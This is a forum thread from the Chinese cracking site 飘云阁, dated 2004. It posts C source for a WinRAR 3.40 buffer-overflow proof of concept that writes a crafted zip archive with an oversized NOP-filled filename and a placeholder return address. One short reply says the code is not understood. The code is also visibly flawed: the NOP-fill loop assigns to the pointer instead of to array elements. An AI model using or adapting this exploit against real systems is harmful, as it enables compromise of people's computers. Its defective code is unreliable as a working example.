设为首页收藏本站官方微博
开启辅助访问 切换到窄版

飘云阁

 找回密码
 加入我们

QQ登录

只需一步,快速开始

[x86]PYG官方Dll优雅破解补丁制作工具[x64]PYG官方DLL优雅破解补丁制作工具[x86]PYG官方Exe优雅破解补丁制作工具[x86/x64]Baymax Patch Tools
返回列表 发新帖
查看: 1291|回复: 1

WinRAR <= 3.41缓冲区溢出漏洞源程序

[复制链接]
飘云
  • TA的每日心情
    开心
    2024-12-1 11:04

    • 签到天数: 12 天

    [LV.3]偶尔看看II
    发表于 2004-12-22 10:06:17 | 显示全部楼层 |阅读模式
    /*
    WinRAR 3.40 Buffer Overflow POC
    Thanks to Miguel Tarasco Acuna. He has made a wonderful code for
    Microsoft Windows Vulnerability in Compressed (zipped) Folders (MS04-034)
    which I edited and made this code by.


    Coded by Vafa Khoshaein - [email protected]
    Vulnerability discovery date : December 10, 2004


    Run this code and creat vulnerable_zip.zip then open the file in WinRAR 3.40
    there exists a file, Try to delete the file - SECU


    */
    #include <stdio.h>
    #include <windows.h>


    #pragma pack(1)


    #define DATOS "[email protected]"


    typedef struct {
    DWORD Signature;
    WORD VersionNeeded;
    WORD GeneralPurposeFlag;
    WORD CompressionMethod;
    WORD ModFileTime;
    WORD ModFileDate;
    DWORD Crc32;
    DWORD CompressedSize;
    DWORD UncompressedSize;
    WORD FilenameLength;
    WORD ExtraFieldLength;
    }TOPHEADER;


    typedef struct {
    DWORD Signature;
    WORD MadeVersion;
    WORD VersionNeeded;
    WORD GeneralPurposeFlag;
    WORD CompressionMethod;
    WORD ModFileTime;
    WORD ModFileDate;
    DWORD Crc32;
    DWORD CompressedSize;
    DWORD UncompressedSize;
    WORD FilenameLength;
    WORD ExtraFieldLength;
    WORD FileCommentLength;
    WORD DiskNumberStart;
    WORD InternalFileAttributes;
    DWORD ExternalFileAttributes;
    DWORD RelativeOffsetOfLocalHeader;
    }MIDDLEHEADER;


    typedef struct {
    DWORD Signature;
    WORD NumOfThisDisk;
    WORD NumDisckStartCentralDirectory;
    WORD NumEntriesCentralDirOnThisDisk;
    WORD TotalNumEntriesCentralDir;
    DWORD SizeCentralDirectory;
    DWORD OffsetCentraDirRespectStartDiskNum;
    WORD ZipCommentLength;
    }BOTTOMHEADER;


    int main(int argc,char *argv[]) {


    FILE *ZipFile;
    TOPHEADER *Cabecera1;
    MIDDLEHEADER *Cabecera2;
    BOTTOMHEADER *Cabecera3;


    DWORD c;
    UINT i;
    char *filename;
    char *url;
    printf("\nWinRAR 3.40 Buffer Overflow POC\n");
    printf("\nCoded by Vafa Khoshaein ([email protected])\n");


    if (!(ZipFile=fopen("vulnerable_zip.zip","w+b"))) {
    printf("\nError in creating vulnerable_zip.zip\n");
    exit(1);
    }


    c=30800;
    filename=(char*)malloc(sizeof(char)*c);
    memset(filename,0,sizeof(filename));


    for( i=0;i<30800;i++) filename=0x90;


    // Return Address
    memcpy(&filename[479],"aaaa",4); /////////// Ret Addr EIP 0x41414141


    Cabecera1=(TOPHEADER*)malloc(sizeof(TOPHEADER));
    Cabecera2=(MIDDLEHEADER*)malloc(sizeof(MIDDLEHEADER));
    Cabecera3=(BOTTOMHEADER*)malloc(sizeof(BOTTOMHEADER));
    memset(Cabecera1,0,sizeof(TOPHEADER));
    memset(Cabecera2,0,sizeof(MIDDLEHEADER));
    memset(Cabecera3,0,sizeof(BOTTOMHEADER));


    Cabecera1->Signature=0x00000050; // DWORD
    Cabecera1->VersionNeeded=0x000A; // WORD
    Cabecera1->GeneralPurposeFlag=0x0002; // WORD
    Cabecera1->CompressionMethod=0x0000; // WORD
    Cabecera1->ModFileTime=0x1362; // WORD
    Cabecera1->ModFileDate=0x3154; // WORD
    Cabecera1->Crc32=0x85B36639; // DWORD
    Cabecera1->CompressedSize=0x00000015; // DWORD
    Cabecera1->UncompressedSize=0x00000015; // DWORD
    Cabecera1->FilenameLength=(WORD)c; // WORD 0x0400
    Cabecera1->ExtraFieldLength=0x0000; // WORD
    Cabecera2->Signature=0x02014B50; // DWORD
    Cabecera2->MadeVersion=0x0014; // WORD
    Cabecera2->VersionNeeded=0x000A; // WORD
    Cabecera2->GeneralPurposeFlag=0x0002; // WORD
    Cabecera2->CompressionMethod=0x0000; // WORD
    Cabecera2->ModFileTime=0x1362; // WORD
    Cabecera2->ModFileDate=0x3154; // WORD
    Cabecera2->Crc32=0x85B36639; // DWORD
    Cabecera2->CompressedSize=0x00000015; // DWORD
    Cabecera2->UncompressedSize=0x00000015; // DWORD
    Cabecera2->FilenameLength=(WORD)c; // WORD 0x0400;//strlen(filename);
    Cabecera2->ExtraFieldLength=0x0000; // WORD
    Cabecera2->FileCommentLength=0x0000; // WORD
    Cabecera2->DiskNumberStart=0x0000; // WORD
    Cabecera2->InternalFileAttributes=0x0001; // WORD
    Cabecera2->ExternalFileAttributes=0x00000020; // DWORD
    Cabecera2->RelativeOffsetOfLocalHeader=0x00000000; // DWORD
    Cabecera3->Signature=0x06054B50; // DWORD
    Cabecera3->NumOfThisDisk=0x0000; // WORD
    Cabecera3->NumDisckStartCentralDirectory=0x0000; // WORD
    Cabecera3->NumEntriesCentralDirOnThisDisk=0x0001;
    Cabecera3->TotalNumEntriesCentralDir=0x0001;
    Cabecera3->SizeCentralDirectory=sizeof(MIDDLEHEADER)+c;
    Cabecera3->OffsetCentraDirRespectStartDiskNum=sizeof(TOPHEADER)+strlen(DATOS)+c;
    Cabecera3->ZipCommentLength=0x0000;


    fwrite(Cabecera1, sizeof(TOPHEADER), 1,ZipFile);

    fwrite(filename, c, 1,ZipFile);
    fwrite(DATOS,strlen(DATOS),1,ZipFile);


    fwrite(Cabecera2, sizeof(MIDDLEHEADER), 1,ZipFile);
    fwrite(filename, c, 1,ZipFile);
    fwrite(Cabecera3, sizeof(BOTTOMHEADER), 1,ZipFile);


    fclose(ZipFile);
    printf("\nvulnerable_zip.zip has been created\n\n");
    return 1;
    }
    PYG19周年生日快乐!
    回复

    使用道具 举报

    傲视风云

    该用户从未签到
    发表于 2006-4-12 03:34:54 | 显示全部楼层
    我嬲   这个更不懂   看它认得我不   
                我是不认得它的咯    呵呵
    PYG19周年生日快乐!
    回复 支持 反对

    使用道具 举报

    返回列表 发新帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 加入我们

    本版积分规则

    快速回复 返回顶部 返回列表